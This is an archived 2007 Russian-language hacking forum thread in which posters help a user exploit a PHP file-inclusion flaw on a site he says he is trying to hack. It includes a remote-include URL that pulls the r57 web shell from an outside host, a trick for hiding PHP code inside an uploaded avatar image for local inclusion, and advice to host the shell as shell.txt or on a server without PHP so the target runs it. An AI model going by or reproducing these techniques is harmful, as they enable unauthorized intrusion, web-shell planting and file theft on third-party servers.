PDA

Просмотр полной версии : Несколько моментов про инклюды


Dark_G
12.02.2007, 19:00
Нашел на сервере скрипт, позволяющий просматривать любые файлы на сервере и инклудить php скрипты. Попытался инклудить r57 шелл с сайта на fatal.ru, но почему-то не получилось. На сервере стоит Windows 2003 server. Не подскажете что можно в данном случае сделать?

n0ne
12.02.2007, 19:10
значит плохо пытался, пытайся лучше, р57 ничем не хуже других пхп, и вообще если у тя не получаеца залить, с чего ты взял что вообще можно пхп инк делать?

Constantine
12.02.2007, 19:36
Ну если позволяет инклудить это очень хорошо. Кстати, не приходило в голову что инклуд может быть локальным, позтому конструкция http://site.ru/file=http://othersite.ru/r57.php не работает. Залей php шелл на тот сервис, можт там есть форум или можно подгружать файлы.

Termin@L
12.02.2007, 21:16
Constantine дело говорит, просто иногда перед тем как инклудить скрипт или файл, сначала проверяют его существование, поэтому инклудить можно только локально... если есть на сайте форум и можно грузить аватары с компа, то берёшь картинку открываешь в блокноте и в конец добавляешь пхп код, грузишь и инклудишь - вуаля. правда не везде покатит, но как вариант

Lesnoy_chelovek
13.02.2007, 05:05
Так, а мне вот интересно, мой шелл нафига трогать и палить, а?

Dark_G
14.02.2007, 22:14
Меня больше другое волнует. Когда, я допустим, инклудю пхпшник, в котором, к примеру выполняется только phpinfo(), он мне выдает результат не от того сайта, который я пытаюсь взломать, а от того, на котором залит пхпшник. Почему же он все таки выполняется на втором сайте а не на аттакуемом?

Termin@L
14.02.2007, 22:24
Ну это фиг знает, значит это не инклуд, либо ты что-то перепутал...

Spyder
15.02.2007, 11:30
2 Dark_G
видимо это не инклуд, а просто редирект на другую страничку. Такая фигня на вэб каталогах есть

Dark_G
15.02.2007, 21:22
2 Dark_G
видимо это не инклуд, а просто редирект на другую страничку. Такая фигня на вэб каталогах есть
Если редирект, то только из фрейма. Но все равно с этого ведь можно что-то поиметь! Просмотр файлов, как никак.

m0nzt3r
18.02.2007, 11:03
Меня больше другое волнует. Когда, я допустим, инклудю пхпшник, в котором, к примеру выполняется только phpinfo(), он мне выдает результат не от того сайта, который я пытаюсь взломать, а от того, на котором залит пхпшник. Почему же он все таки выполняется на втором сайте а не на аттакуемом?
не догадываешь почему? :D это потому что тот хост, где у тебя пхп скрипт, поддерживает пхп скрипты.А ты инклудишь его :D лол..надо хостинг, который не поддерживает пхп

VDShark
18.02.2007, 11:05
Да)))) Бывает и такое, инклудить пытаются, а он еще на твоем серваке выполняется) Возьми сервак без поддержки пхп )

Talisman
18.02.2007, 11:32
narod.ru )))))

kair
18.02.2007, 11:51
Ага, я вот тоже так думаю, что хостинг должен быть без php.
Если не трудно, дай ссылку!

Abra
18.02.2007, 12:48
хостинг должен быть без php.
Извращенцы вы все.
просто переименовать в shell.txt не проше?
инклуду как-то пофиг на расширение, а серверу нет.

VDShark
18.02.2007, 15:55
=) Ну нужно же погонять человека, пусть знает где хостинги брать) А до переименования и сам мог бы додуматься, это вытекает из всего вышесказанного=/